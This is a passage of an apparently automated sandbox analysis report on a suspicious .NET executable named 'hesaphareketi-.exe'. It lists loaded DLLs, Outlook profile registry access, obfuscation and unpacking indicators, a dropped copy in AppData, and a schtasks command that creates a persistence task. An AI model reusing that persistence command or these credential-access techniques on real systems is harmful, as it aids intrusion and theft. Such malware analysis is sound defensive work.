                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeSection loaded: edputil.dll
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: hesaphareketi-.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: hesaphareketi-.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, F20LWFVHgRjD1hgb3j.cs.Net Code: dWUJRPvyRJ System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeCode function: 8_2_066EA930 push es; ret 8_2_066EA940
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeCode function: 13_2_069419A5 push es; ret 13_2_069419AC
                    Source: hesaphareketi-.exeStatic PE information: section name: .text entropy: 7.973890761853698
                    Source: xyodEPhulIrkY.exe.0.drStatic PE information: section name: .text entropy: 7.973890761853698
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, JLe6m0JVI7W98w4t5s.csHigh entropy of concatenated method names: 'PXMgSOmyU1', 'dDHgV9qSUK', 'YJwgwIWl92', 'TsRgC3uxVb', 'KPmgDhcLbF', 'O1bg06BNis', 'dDl4smuF3lN21RQpPj', 'vrayaa7YShP4xcfceg', 'HBQggr60nq', 'OnFgYTVAx0'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, BAqdu2tZUYWeAgev1s.csHigh entropy of concatenated method names: 'WF1bwrkdPq', 'xyLbCjOexI', 'ToString', 'YMDbcYayuk', 'icwbd7Z1Zt', 'pkabxhbH2E', 'BIJbhvG94g', 'Nx7biU5YLL', 'yarbSI2Aft', 'HsCbVHjjy2'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, AVkm8InX6lcvvv10tM.csHigh entropy of concatenated method names: 'GHiq7UeFbc', 'dWJqZAMUaB', 'xkqqIp8eVw', 'Rk3qefO1je', 'xLRqHHK9Wt', 'q3sq1YeIEg', 'YHnqF1QRTs', 'SoSqKBvuM7', 'XVwqsALhiK', 'DgUqyHHPn0'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, LYkbs8FO0PYvEPcgSo.csHigh entropy of concatenated method names: 'kZqScrhmBR', 'gLBSxaYSfp', 'QfQSipvcY2', 'wdTiPtCRWO', 'k45izIIsvC', 'HDRSfDZSa6', 'o3qSgDnllw', 'zwuSrjrZcP', 'zc6SYYRNwr', 'lhtSJJlJJK'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, g1TRgK3U5nRcEG5wUg.csHigh entropy of concatenated method names: 'EZMSpPwt5n', 'mc9SmaNNDu', 'uvwSR66VSs', 'jNlSWUjERF', 'RPMSa6lAI7', 'O2xSAu3k1f', 'TdtSu7O6c2', 'agxS7DqMAT', 'eGOSZjX9ZD', 'U6GSjUJdZp'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, zHTY2RXOZnp6HaMgIa.csHigh entropy of concatenated method names: 'c0MbvhLfYY', 'MimbPuQRYL', 'IGU2frawt1', 'L0c2gMEEY7', 'xl8byHT96w', 'ObnbToxW0J', 'sS3bnjvKSV', 'FgYb43j7r4', 'XDnbOwi0c6', 'm38bN6bRFl'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, Lysk8PZJwIWl92tsR3.csHigh entropy of concatenated method names: 'AVcxWW4DlC', 'eQ6xAi4V0N', 'hFnx7TuVQN', 'rHyxZ2dtCB', 'Vw0xDK33DV', 'pk7x0I8j34', 'yp0xbGV69J', 'Pklx2lpAsl', 'UBFxMiNHs7', 'FKFx8EBFxu'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, I8gbKBPIFsh7sO6RDp.csHigh entropy of concatenated method names: 'kP7MgpYflT', 'X13MYsUUas', 'T8HMJUZlyS', 'NZHMcey9ZT', 'QgTMd4X2q8', 'tuKMhP2AOe', 'xmbMiTkEID', 'zZQ2kt8u1K', 'VAQ2vZbuiZ', 'HFu2LEg9rd'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, XbFy1bI6BNisxcL8lJ.csHigh entropy of concatenated method names: 'OrxiBcTmBU', 'QFFidqEysC', 'm42ihPpnrq', 'bUWiS34Zv8', 'moHiVmEqQH', 'gsThGwg64L', 'jbhhXPV6yn', 'q52hkG279D', 'WPphvP3k08', 'YJahLpmW72'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, qtZqvMdjbJfMeWP9dC.csHigh entropy of concatenated method names: 'Dispose', 's3ngLbNeIS', 'X4Rrer01tf', 'rA544trITb', 'ym1gPANpgl', 'JvegzpJfdm', 'ProcessDialogKey', 'B9prftc3hw', 'CwErgXgGVy', 'oamrrH8gbK'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, MG927nNEE6QY8Nd6uS.csHigh entropy of concatenated method names: 'ToString', 'XN00yqbCJB', 'FO10exQXiC', 'CN80Uy6JKX', 'gH80Hoe7L6', 'uN201Mq4VK', 'sji09RBgYw', 'CvD0F0ynkm', 'MM40K2L3fI', 'q8L03QqxVL'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, y1ANpgvl1vepJfdmA9.csHigh entropy of concatenated method names: 'b3n2cSEdPR', 'uMl2d3JBia', 'WnI2xxT7fF', 'C1M2hJZ7yP', 'KfM2iHvU3b', 'jkL2SUV73S', 'IS72VpJuho', 'aKP2Q6bPwy', 'Klm2wXbuGe', 'Ly02C77G8A'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, xtc3hwLAwEXgGVyDam.csHigh entropy of concatenated method names: 'D0L2Ic9M4M', 'nO62eNoJKR', 'KOW2UsuMrB', 'yvi2HgxQW6', 'XxQ24BoHbK', 'rsP21ecSno', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, NPeksFgYcSe8B0FI7oE.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DcR84JCfHT', 'MdF8O2jXpP', 'lZ88N7Q2gp', 'Ky98tbgguA', 'WRR8Gfmj4A', 'Iw78XqXRRx', 'dUZ8kNBcHk'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, rOmyU17JDH9qSUKV5w.csHigh entropy of concatenated method names: 'LG9d4IrvbV', 'MfjdOTsLec', 'QANdNOIyIT', 'PL1dtBgkr9', 'MUvdGUE8s6', 'CdbdX91MIE', 'aLZdkdd49k', 'qQmdvBjdc2', 't5gdLgJJIW', 'XppdPvgExy'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, F20LWFVHgRjD1hgb3j.csHigh entropy of concatenated method names: 'Ae3YBFmYd6', 'IuRYcHTyT1', 'O3CYdrZUnh', 'C9TYxQ4N48', 'ztpYhNrgo8', 'lG9YiR2a3j', 'edSYSw21Jw', 'SCPYVh4ib5', 'y7lYQEORvW', 'b2rYwb5jLa'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, zx1knCgfXJiQfOm40s6.csHigh entropy of concatenated method names: 'lkZMp8iMTg', 'Ie0MmwVNey', 'npdMREGQuI', 'nJEMWk1Vdi', 'JJeMacHOaq', 'zJUMAp0Nm9', 'NlRMueGpP0', 'Mp0M7DSIU7', 'OyrMZqaK45', 'SWwMjMS83r'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, BdQBg9ggM9qnIQ52I06.csHigh entropy of concatenated method names: 'ToString', 'B1L8YjmywZ', 'v7O8JhH6qp', 'ex48BWtMAi', 'mKp8cmeN8T', 'xR38dAMPen', 'HmF8xYSQZb', 'Ya78hIoIo0', 'BfFxpqykgqtGrv9WZvP', 'hRVDdJyOtCGiaBlnYqh'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, aDT2cHrHXfmMo3lhFr.csHigh entropy of concatenated method names: 'ucBRKxGSW', 'FN6WGgKEL', 'kKBA0Mfrx', 'QCcuoiXAg', 'XvKZulCV4', 'r12jcqDhd', 'rDLsumnqn0dKgkyuhO', 'FKCsAvFmFANxlJVcMu', 'xGX2vjExD', 'O7k8iop5s'
                    Source: 0.2.hesaphareketi-.exe.3807c58.3.raw.unpack, DxVbtJjpm1602FPmhc.csHigh entropy of concatenated method names: 'fANhafQ3my', 'IRQhu3q84D', 'wtkxUiPEFl', 'gNJxHDbZIs', 'qAsx1Gx2BA', 'gCAx9Noi4S', 'QatxFuMhHv', 'ttrxKXOifW', 'SFBx3dCUqn', 'cT6xsSChpV'
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeFile created: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpE555.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
